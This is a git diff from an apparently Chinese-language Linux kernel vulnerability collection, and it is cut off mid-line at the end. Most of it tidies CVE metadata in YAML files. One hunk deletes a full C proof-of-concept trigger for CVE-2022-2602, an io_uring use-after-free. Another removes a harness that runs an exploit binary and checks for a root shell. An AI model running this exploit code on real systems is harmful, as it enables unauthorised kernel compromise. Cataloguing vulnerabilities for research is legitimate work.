15bc9b531d0ec38d85248ec0857c5106f7d22b69..05ed7647b4a98d769709ef7695f28f064521706e 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-4154.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-4154.yaml @@ -17,4 +17,6 @@ info: cvss-score: 8.8 cve-id: CVE-2021-4154 cwe-id: CWE-416 + cnvd-id: None + kve-id: None tags: cve2021, 内存错误引用 \ No newline at end of file diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-42008.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-42008.yaml index e34d9dd16e4f24bb4117e2ec45106b376d5e9986..92ccf20a5ead5b0141fa6f58468614491ce9fd9d 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-42008.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-42008.yaml @@ -6,7 +6,7 @@ info: description: | The decode_data function in drivers/net/hamradio/6pack.c in the Linux kernel before 5.13.13 has a slab out-of-bounds write. Input from a process that has the CAP_NET_ADMIN capability can lead to root access scope-of-influence: - Linux 2.1.94~v5.13.12 + Linux 2.1.94 < Linux-Kernel < v5.13.12 reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-42008 - https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.13.13 @@ -16,6 +16,6 @@ info: cvss-score: 7.8 cve-id: CVE-2021-42008 cwe-id: CWE-787 - cnvd-id: - kve-id: + cnvd-id: None + kve-id: None tags: 协议解码溢出 \ No newline at end of file diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-4204.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-4204.yaml index af36da213d1b95eb4606ba5cad064c43361dcf70..004b603d9f68a474299c82910747c5e9c9af74e5 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-4204.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-4204.yaml @@ -11,8 +11,10 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-4204 - https://www.openwall.com/lists/oss-security/2022/01/11/4 classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H cvss-score: 7.1 cve-id: CVE-2021-4204 - cwe-id: CWE-787, CEW-20 - tags: cve2021,权限提升 \ No newline at end of file + cwe-id: CWE-787, CWE-20 + cnvd-id: None + kve-id: None + tags: cve2021, 权限提升 \ No newline at end of file diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-42327.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-42327.yaml index 883f66527f0aa8500f86675b9572d4f56929610f..ad6af5fdd03985fff4c7406ca73a7cb3d544a7f5 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-42327.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-42327.yaml @@ -5,13 +5,10 @@ info: severity: medium description: | Linux内核5.14.14版本之前的驱动程序/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_debugfs.c 中的dp_link_settings_write允许攻击者基于堆的缓冲区溢出,攻击者可以将字符串写入 AMD GPU 显示驱动程序调试文件系统。当它使用 copy_from_user 的大小将用户空间缓冲区复制到 40 字节堆缓冲区时,不会检查 parse_write_buffer_into_params 内的大小。 - scope-of-influence: - Linux kernel before 5.14.14 - + Linux kernel < 5.14.14 reference: - https://nvd.nist.gov/vuln/detail/cve-2021-42327 - classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 6.7 @@ -19,5 +16,4 @@ info: cwe-id: CWE-787 cnvd-id: None kve-id: None - tags: 缓冲区溢出 \ No newline at end of file diff --git a/cve/linux-kernel/2022/CVE-2022-2602/README.md b/cve/linux-kernel/2022/CVE-2022-2602/README.md deleted file mode 100644 index ccaf80aa301dfaed97b2ce40dd71ab09ef5fc5df..0000000000000000000000000000000000000000 --- a/cve/linux-kernel/2022/CVE-2022-2602/README.md +++ /dev/null @@ -1,6 +0,0 @@ -### 漏洞复现 -```shell -$ gcc poc.c -o poc -$ chmod +x ./poc -$ ./poc -``` \ No newline at end of file diff --git a/cve/linux-kernel/2022/CVE-2022-2602/poc.c b/cve/linux-kernel/2022/CVE-2022-2602/poc.c deleted file mode 100644 index 89696fba578666bc2a8069eb39093ddbd93ba6e4..0000000000000000000000000000000000000000 --- a/cve/linux-kernel/2022/CVE-2022-2602/poc.c +++ /dev/null @@ -1,174 +0,0 @@ -#define _GNU_SOURCE -#include -#include -#include -#include -#include - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -static int userfaultfd(int flags) -{ - return syscall(__NR_userfaultfd, flags); -} - -static char buffer[4096]; -static void fault_manager(int ufd) -{ - struct uffd_msg msg; - struct uffdio_copy copy; - read(ufd, &msg, sizeof(msg)); - if (msg.event != UFFD_EVENT_PAGEFAULT) - err(1, "event not pagefault"); - copy.dst = msg.arg.pagefault.address; - copy.src = (long) buffer; - copy.len = 4096; - copy.mode = 0; - copy.copy = 0; - sleep(2); - ioctl(ufd, UFFDIO_COPY, ©); - close(ufd); -} - -static char *bogus; - -static void start_ufd(int ufd) -{ - struct uffdio_api api; - struct uffdio_register reg; - - bogus = mmap(NULL, 4096, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); - - api.api = UFFD_API; - api.features = 0; - api.ioctls = 0; - ioctl(ufd, UFFDIO_API, &api); - - reg.range.start = (long) bogus; - reg.range.len = 4096; - reg.mode = UFFDIO_REGISTER_MODE_MISSING; - reg.ioctls = 0; - - ioctl(ufd, UFFDIO_REGISTER, ®); -} - - -int sendfd(int s, int fd) -{ - struct msghdr msg; - char buf[4096]; - struct cmsghdr *cmsg; - int fds[1] = { fd }; - - memset(&msg, 0, sizeof(msg)); - memset(buf, 0, sizeof(buf)); - - msg.msg_control = buf; - msg.msg_controllen = sizeof(buf); - - cmsg = CMSG_FIRSTHDR(&msg); - cmsg->cmsg_level = SOL_SOCKET; - cmsg->cmsg_type = SCM_RIGHTS; - cmsg->cmsg_len = CMSG_LEN(sizeof(fds)); - memcpy(CMSG_DATA(cmsg), fds, sizeof(fds)); - - msg.msg_controllen = CMSG_SPACE(sizeof(fds)); - - sendmsg(s, &msg, 0); -} - -int io_uring_setup(int r, void *p) -{ - return syscall(__NR_io_uring_setup, r, p); -} - -int io_uring_enter(unsigned int fd, unsigned int to_submit, unsigned int min_complete, unsigned int flags, sigset_t *sig) -{ - return syscall(__NR_io_uring_enter, fd, to_submit, min_complete, flags, sig); -} - -int io_uring_register(unsigned int fd, unsigned int opcode, void *arg, unsigned int nr_args) -{ - return syscall(__NR_io_uring_register, fd, opcode, arg, nr_args); -} - -int prepare_request(int fd, struct io_uring_params *params, struct io_uring *ring) -{ - struct io_uring_sqe *sqe; - io_uring_queue_mmap(fd, params, ring); - sqe = io_uring_get_sqe(ring); - sqe->opcode = IORING_OP_WRITEV; - sqe->fd = 1; - sqe->addr = (long) bogus; - sqe->len = 1; - sqe->flags = IOSQE_FIXED_FILE; -} - -int main(int argc, char **argv) -{ - int ufd; - pid_t manager; - - struct io_uring ring; - int fd; - struct io_uring_params *params; - int rfd[32]; - int s[2]; - int backup_fd; - - struct iovec *iov; - iov = (void *) buffer; - iov->iov_base = "hello, world!\n"; - iov->iov_len = 14; - - ufd = userfaultfd(0); - if (ufd < 0) - err(1, "userfaultfd"); - start_ufd(ufd); - - if ((manager = fork()) == 0) { - fault_manager(ufd); - exit(0); - } - close(ufd); - - socketpair(AF_UNIX, SOCK_DGRAM, 0, s); - - params = malloc(sizeof(*params)); - memset(params, 0, sizeof(*params)); - params->flags = IORING_SETUP_SQPOLL; - fd = io_uring_setup(32, params); - - rfd[0] = s[1]; - rfd[1] = open("null", O_RDWR | O_CREAT | O_TRUNC, 0644); - io_uring_register(fd, IORING_REGISTER_FILES, rfd, 2); - close(rfd[1]); - - sendfd(s[0], fd); - - close(s[0]); - close(s[1]); - - prepare_request(fd, params, &ring); - io_uring_submit(&ring); - - io_uring_queue_exit(&ring); - - sleep(1); - - close(socket(AF_UNIX, SOCK_DGRAM, 0)); - - wait(NULL); - wait(NULL); - - return 0; -} diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-0185.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-0185.yaml index 4fa8b80c5e73194a63ae36f1e894a2e5424ab6f4..0e6d5a3b21775246abc7c57eea0cf1c63050a7a5 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-0185.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-0185.yaml @@ -6,14 +6,16 @@ info: description: | Linux kernel 存在输入验证错误漏洞,该漏洞源于在 Linux kernel 的 Filesystem Context 中的 legacy_parse_param 函数验证提供的参数长度的方式中发现了一个基于堆的缓冲区溢出缺陷。 非特权(在启用非特权用户命名空间的情况下,否则需要命名空间的 CAP_SYS_ADMIN 特权)本地用户能够打开不支持文件系统上下文 API 的文件系统(因此回退到遗留处理)可以使用此缺陷来提升他们在系统上的权限。 scope-of-influence: - 5.1-rc1~5.16.2 + 5.1-rc1 ≤ Linux-Kernel ≤ 5.16.2 reference: - http://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2022-0185 - https://nvd.nist.gov/vuln/detail/CVE-2022-0185 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=722d94847de29310e8aa03fcbdb41fc92c521756 classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.4 cve-id: CVE-2022-0185 cwe-id: CWE-190 - tags: 权限提升,容器逃逸,cve2022 \ No newline at end of file + cnvd-id: None + kve-id: None + tags: 权限提升, 容器逃逸, cve2022 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-0435.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-0435.yaml index 64fbf4c341e37ad6fbc62d806cfa8ad33e18f17f..6ddbf77b3ba1bc037f4c1e8e6cfc90946d528605 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-0435.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-0435.yaml @@ -1,6 +1,5 @@ id: CVE-2022-0435 -source: - https://github.com/wlswotmd/CVE-2022-0435 +source: https://github.com/wlswotmd/CVE-2022-0435 info: name: Linux kernel是Linux操作系统的主要组件, 也是计算机硬件与其进程之间的核心. 它负责两者之间的通信, 还要尽可能高效地管理资源. Linux kernel主要负责内存管理、进程管理、设备驱动程序、系统调用和安全防护四项作用. severity: high diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-0492.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-0492.yaml index 6d5a4c484f2af8469a556c354bcf011be85218f7..8e9389073cf4e9e067074fa2b1dbb8048049724e 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-0492.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-0492.yaml @@ -2,18 +2,20 @@ id: CVE-2022-0492 source: https://github.com/PaloAltoNetworks/can-ctr-escape-cve-2022-0492 info: name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: 高危 + severity: High description: | A vulnerability was found in the Linux kernel’s cgroup_release_agent_write in the kernel/cgroup/cgroup-v1.c function. This flaw, under certain circumstances, allows the use of the cgroups v1 release_agent feature to escalate privileges and bypass the namespace isolation unexpectedly. scope-of-influence: - 2.6.24-rc1~5.17-rc3 + 2.6.24-rc1 ≤ Linux-Kernel ≤ 5.17-rc3 reference: - http://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2022-0492 - https://nvd.nist.gov/vuln/detail/CVE-2022-0492 - https://git.kernel.org/linus/24f6008564183aa120d07c03d9289519c2fe02af classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-0492 cwe-id: CWE-287 - tags: 权限提升,容器逃逸,cve2022 \ No newline at end of file + cnvd-id: None + kve-id: None + tags: 权限提升, 容器逃逸, cve2022 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-0847.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-0847.yaml index b5a2849209081f9001eb55ecba52e8f74da53dd9..04f3fdc482c6e1b3743532a7022011c2d5a28531 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-0847.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-0847.yaml @@ -12,7 +12,7 @@ info: - https://bugzilla.redhat.com/show_bug.cgi?id=2060795 - https://security.netapp.com/advisory/ntap-20220325-0005/ classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-0847 cwe-id: CWE-665, CWE-281 diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-0995.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-0995.yaml index 6cbe896836e21237d35ac9e0cb1ab2809da6bf8c..14847983ab63369e8f65219bad7634c2e70751a5 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-0995.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-0995.yaml @@ -15,6 +15,6 @@ info: cvss-score: 7.8 cve-id: CVE-2022-0995 cwe-id: CWE-787 - cnvd-id: - kve-id: - tags: 内核越界,权限提升,cve2022 \ No newline at end of file + cnvd-id: None + kve-id: None + tags: 内核越界, 权限提升, cve2022 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-1015.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-1015.yaml index d4339dfcc0df33a5a18e1a1e7c3127d15689d120..0fa3364c6f733fcd00d1fcd73f12949964a150b1 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-1015.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-1015.yaml @@ -2,17 +2,19 @@ id: CVE-2022-1015 source: https://github.com/pqlx/CVE-2022-1015 info: name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: high + severity: Medium description: | 在netfilter子系统的linux/net/netfilter/nf_tables_api.c中发现了Linux内核的一个缺陷。此漏洞允许本地用户导致越界写入问题。 scope-of-influence: - 5.12 ≤ kernel < 5.17 + 5.12 ≤ Linux-Kernel < 5.17 reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-1015 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=6e1acfa387b9ff82cfc7db8cc3b6959221a95851 classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H cvss-score: 6.6 cve-id: CVE-2022-1015 cwe-id: CWE-787 - tags: cve2022,权限提升 \ No newline at end of file + cnvd-id: None + kve-id: None + tags: cve2022, 权限提升 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-1679.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-1679.yaml index d07729f3b58a5d61565cdfb608d1e53d99062544..7c50227b69234f8d70d55b0842699fb9a4f04692 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-1679.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-1679.yaml @@ -16,4 +16,5 @@ info: cve-id: CVE-2022-1679 cwe-id: CWE-416 cnvd-id: None + kve-id: None tags: 权限提升, cve2022 diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-23222.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-23222.yaml index dec1b6bf776cee497be00474b19a3a8e174c941b..461d29121b5839cc80ee7d9ae690db3558582318 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-23222.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-23222.yaml @@ -6,7 +6,7 @@ info: description: | 由于 Linux 内核的 BPF 验证器存在一个空指针漏洞,没有对 *_OR_NULL 指针类型进行限制,允许这些类型进行指针运算。攻击者可利用该漏洞在获得低权限的情况下,构造恶意数据执行空指针引用攻击,最终获取服务器 root 权限 scope-of-influence: - Linux kernel(>=5.8 && <=5.16) + 5.8 ≤ Linux kernel ≤ 5.16 reference: - https://www.openwall.com/lists/oss-security/2022/06/04/3 - https://security.netapp.com/advisory/ntap-20220217-0002/ @@ -17,4 +17,4 @@ info: cwe-id: CWE-476 cnvd-id: None kve-id: None - tags: cve2022,权限提升 \ No newline at end of file + tags: cve2022, 权限提升 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-24122.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-24122.yaml index de53968bd0d1b71b85956541c04238094fb7f73b..7ac52ce3dbfd185b173aad94460625ab48177051 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-24122.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-24122.yaml @@ -6,7 +6,7 @@ info: description: | 由于Linux kernel中存在资源管理错误漏洞,当kernel/ucount.c(非特权时)启用非特权用户命名空间时,允许释放后继续使用和特权升级,因为ucounts对象的寿命可以比其命名空间长。 scope-of-influence: - Linux kernel(>=5.14 && <=5.16.4) + 5.14 ≤ Linux kernel ≤ 5.16.4 reference: - https://ubuntu.com/security/CVE-2022-24122 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24122 diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-25258.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-25258.yaml index 75f508925d2a26f0fbffba51b8fcd25e29657c64..6fc8ac15e172aa795be80fe4797bddaaaa8a8f05 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-25258.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-25258.yaml @@ -1,6 +1,5 @@ id: CVE-2022-25258 -source: - https://github.com/szymonh/d-os-descriptor +source: https://github.com/szymonh/d-os-descriptor info: name: Linux kernel是Linux操作系统的主要组件,也是计算机硬件与其进程之间的核心接口。它负责两者之间的通信,还要尽可能高效地管理资源。Linux kernel主要负责内存管理、进程管理、设备驱动程序、系统调用和安全防护四项作用。 severity: medium diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-25265.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-25265.yaml index d64f2726bf2bef6aa76afd6d322193884ab2515a..5c7a3abc8767a6fe1a6e514178eb69266d0741c3 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-25265.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-25265.yaml @@ -10,10 +10,10 @@ info: reference: - https://nvd.nist.gov/vuln/detail/cve-2022-25265 classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-25265 cwe-id: CWE-913 - cnvd-id: none - kve-id: none + cnvd-id: None + kve-id: None tags: Linux kernel, 内存损坏 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-25636.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-25636.yaml index 2c62a5ceb572ffaf6f134d763049dcaef7c170fd..4018b6f4946a4f215c05e451ba5fd1d6ccf1aa80 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-25636.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-25636.yaml @@ -14,5 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-25636 - cnvd-id: CNNVD-202202-1743 - tags: 堆越界,权限提升,cve2022 + cwe-id: CWE-269 + cnvd-id: None + kve-id: None + tags: 堆越界, 权限提升, cve2022 diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-2586.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-2586.yaml index d857929551429400189d9e6f2c1c23a2f28d54c0..271dcfba3fa01b8f0371dd0518c5d468249d1b33 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-2586.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-2586.yaml @@ -25,5 +25,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 6.7 cve-id: CVE-2022-2586 - cnvd-id: NONE + cwe-id: None + cnvd-id: None + kve-id: None tags: netfilter, cve2022 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-2588.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-2588.yaml index d5584e0f57e7d617549fcd036be57a1c0703a2d5..6286b95371fafbd406462ba5a41dce0812e9fe70 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-2588.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-2588.yaml @@ -15,6 +15,6 @@ info: cvss-score: 7.8 cve-id: CVE-2022-2588 cwe-id: CWE-416 - cnvd-id: - kve-id: - tags: UAF,拒绝服务,权限提升,cve2022 \ No newline at end of file + cnvd-id: None + kve-id: None + tags: UAF, 拒绝服务, 权限提升, cve2022 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-2602.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-2602.yaml deleted file mode 100644 index 1f1fc84d8f2899ce73f3edda97883d5d010feafc..0000000000000000000000000000000000000000 --- a/cve/linux-kernel/2022/yaml/CVE-2022-2602.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: CVE-2022-2602 -source: https://seclists.org/oss-sec/2022/q4/57 -info: - name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: high - description: | - io_uring UAF, Unix SCM garbage collection - scope-of-influence: - Linux kernel < 5.10.149-1 - reference: - - https://ubuntu.com/security/CVE-2022-2602 - classification: - cvss-metrics: CVSS:3.1 - cvss-score: 漏洞评分 - cve-id: CVE-2022-2602 - cwe-id: None - cnvd-id: None - kve-id: None - tags: cve2022,UAF \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-2639.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-2639.yaml index 01b0e4d713b79d49e04046b7c03baa6b0286ba5f..74482ef6814231f975e66e233408b9c694ab8726 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-2639.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-2639.yaml @@ -1,48 +1,20 @@ -FormatVer: 20220411 -Id: CVE-2022-2639 -Belong: kernel -PocHazardLevel: low -Source: https://github.com/avboy1337/CVE-2022-2639-PipeVersion -SiteInfo: - Name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核 - Severity: high - Description: +id: CVE-2022-2639 +source: https://github.com/avboy1337/CVE-2022-2639-PipeVersion +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核 + severity: high + description: 由于 openvswitch模块中reserve_sfa_size()函数在使用过程中存在缺陷,导致本地经过身份认证的攻击者可以利用漏洞提升至root权限 - ScopeOfInfluence: - kernel(>=3.13 && <5.18) - References: + scopeOfInfluence: + 3.13 ≤ Linux-Kernel < 5.18 + references: - https://nvd.nist.gov/vuln/detail/CVE-2022-2639 - https://github.com/torvalds/linux/commit/cefa91b2332d7009bc0be5d951d6cbbf349f90f8 - SiteClassification: - CvssMetrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - CvssScore: 7.8 - CveId: CVE-2022-2639 - CweId: None - CnvdId: None - KveId: None - Tags: - - ve2022 - - 权限提升 -SiteRequests: - Implement: - ImArray: - - Exec : "CVE-2022-2639_x86_64" - Args : - ExpireTime: 30 #second - - # < input - # > output - # . wait - # ? condition - # : content - # - #组合起来 - # >. 等待直到输出 - # << 输入字符 - # >?判断条件 - Inter: - - ">.:infinitely ..." #等待输出'infinitely ...' - - "<<:id\n" #输入'id\n' - - ">.:\n" #等待输出'\n' - - ">?:uid=0(root)" #判断输出为'uid=0(root)'为成功 - Condition: None + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2022-2639 + cwe-id: CWE-171, CWE-787, CWE-192 + cnvd-id: None + kve-id: None + tags: cve2022, 权限提升 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-27666.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-27666.yaml index e9c89f4bcb42a4a4240e6d9a6a6b87285ff43fb8..cc94bd93ba3099130b785ae169bae6111b392cc9 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-27666.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-27666.yaml @@ -6,7 +6,7 @@ info: description: | Linux kernel 5.16.15之前版本存在安全漏洞,该漏洞源于net/ipv4/esp4.c 和 net/ipv6/esp6.c 中IPsec ESP 代码存在缓冲区溢出。本地攻击者可利用该漏洞通过覆盖内核堆对象获得特权。 scope-of-influence: - ~ linux kernel 5.17-rc5 + linux kernel < 5.17-rc5 reference: - https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.16.15 - https://www.debian.org/security/2022/dsa-5173 @@ -15,4 +15,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-27666 - tags: 缓冲区溢出,权限提升,cve2022 + cwe-id: CWE-787 + cnvd-id: None + kve-id: None + tags: 缓冲区溢出, 权限提升, cve2022 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-32250.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-32250.yaml index 611fb2f14924f12afb97261c2172e9bad80466d9..1f8c0acbcaf5d381cd3b5a4399c01e6fc039d806 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-32250.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-32250.yaml @@ -14,5 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-32250 - cnvd-id: CNNVD-202206-407 - tags: CVSS严重性评级,修复信息,易受攻击的软件版本,SCAP映射,CPE信息,cve2022 + cwe-id: CWE-416 + cnvd-id: None + kve-id: None + tags: Linux Kernel, cve2022 diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-34918.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-34918.yaml index 179205792b18780e8e59d9110a0bec5c5a6c9dff..e38f5778c57e8a59473128fec6acfa719c1b0db0 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-34918.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-34918.yaml @@ -6,7 +6,7 @@ info: description: | Linux kernel 5.18.9版本及之前版本存在安全漏洞,该漏洞源于。本地攻击者利用该漏洞使用 nft_set_elem_init 中的类型混淆错误(导致缓冲区溢出)来提升权限。 scope-of-influence: - Linux kernel(>=5.8.0 && <=5.18.9) + 5.8.0 ≤ Linux kernel ≤ 5.18.9 reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34918 - https://nvd.nist.gov/vuln/detail/CVE-2022-34918 diff --git a/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-36946.yaml similarity index 86% rename from cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml rename to cve/linux-kernel/2022/yaml/CVE-2022-36946.yaml index eb773fd638c81bc9ea9f9193d64d4af14cafef48..f915cfe692a58478ab6c94370d5bfb8dfecec53d 100644 --- a/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-36946.yaml @@ -1,18 +1,21 @@ -id: CVE-2022-36946 -source: https://github.com/Pwnzer0tt1/CVE-2022-36946 -info: - name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: 高危 - description: | - Linux5.18.14 内核中 net/netfilter/nfnetlink_queue.c 的nfqnl_mangle允许远程攻击者造成拒绝服务 (panic),因为在具有单字节nfta_payload属性的nf_queue判定的情况下,skb_pull可能会遇到负的 skb->len。 - scope-of-influence: - 5.18.14 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-36946 - - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=722d94847de29310e8aa03fcbdb41fc92c521756 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36946 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H - cvss-score: 7.5 - cve-id: CVE-2022-36946 - tags: 拒绝服务,cve2022 \ No newline at end of file +id: CVE-2022-36946 +source: https://github.com/Pwnzer0tt1/CVE-2022-36946 +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: High + description: | + Linux5.18.14 内核中 net/netfilter/nfnetlink_queue.c 的nfqnl_mangle允许远程攻击者造成拒绝服务 (panic),因为在具有单字节nfta_payload属性的nf_queue判定的情况下,skb_pull可能会遇到负的 skb->len。 + scope-of-influence: + Linux-Kernel = 5.18.14 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-36946 + - 